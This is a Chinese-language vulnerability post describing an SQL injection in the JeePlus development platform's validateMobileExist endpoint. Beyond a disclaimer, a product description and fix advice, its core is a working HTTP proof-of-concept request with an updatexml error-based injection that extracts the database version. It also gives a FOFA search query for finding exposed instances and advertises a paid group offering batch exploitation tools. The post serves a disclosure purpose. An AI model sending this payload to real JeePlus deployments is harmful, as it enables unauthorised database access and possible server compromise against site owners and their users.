0x01 免责声明
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!!!
0x02 产品介绍
JeePlus(洁普斯)是一个软件快速开发平台,使用多种现代Web技术,包括Spring Cloud/Spring Boot、MyBatis Plus、Spring Security、Redis、Vue3、Element Plus等。该平台支持多种数据库,如MySQL、Oracle、sqlserver、postgresql等。JeePlus采用标准的SOA架构,依托优秀的前台富客户端框架(如Extjs4.2)实现展示层的MVC(Model View Controller)再分层。它还利用内部升级版的SSH2应用框架和独有的DynaBean数据处理模式,使SQL执行更快更灵活。此外,JeePlus是一个低代码开发平台,解决了开发中大量的重复工作,让开发者更多聚焦业务逻辑,快速开发和部署现代Web应用程序+微服务架构。通过使用JeePlus,可以设计数据库表、配置表单模型、生成代码、一键生成菜单等,从而实现自动建表,根据表生成对应的Domain/DTO、Service、Mapper、Controller、Vue等,支持增删改查/排序/导出导入Excel/权限控制/功能生成直接使用等功能。同时,JeePlus还支持多租户技术,保证系统共性的部分被共享,个性的部分被单独隔离。
0x03 漏洞威胁
JeePlus快速开发平台 validateMobileExist 接口处存在SQL注入漏洞,攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
0x04 漏洞环境
FOFA:
app="JeePlus"
0x05 漏洞复现
POC
GET /a/sys/user/validateMobileExist?&mobile=1%27+and+1%3D%28updatexml%281%2Cconcat%280x7e%2C%28select+version%28%29%29%2C0x7e%29%2C1%29%29+and+%271%27%3D%271 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
查询数据库版本
0x06 批量验证脚本
Nuclei验证脚本已发布
知识星球:冷漠安全
0x07 修复建议
关闭互联网暴露面或接口设置访问权限
升级JeePlus至最新版本
官网下载最新安全补丁:http://www.jeeplus.org/
漏洞详情及批量检测POC工具请前往知识星球获取
知识星球:冷漠安全
交个朋友,限时优惠券:加入立减25
星球福利:每天更新最新漏洞POC、资料文献、内部工具等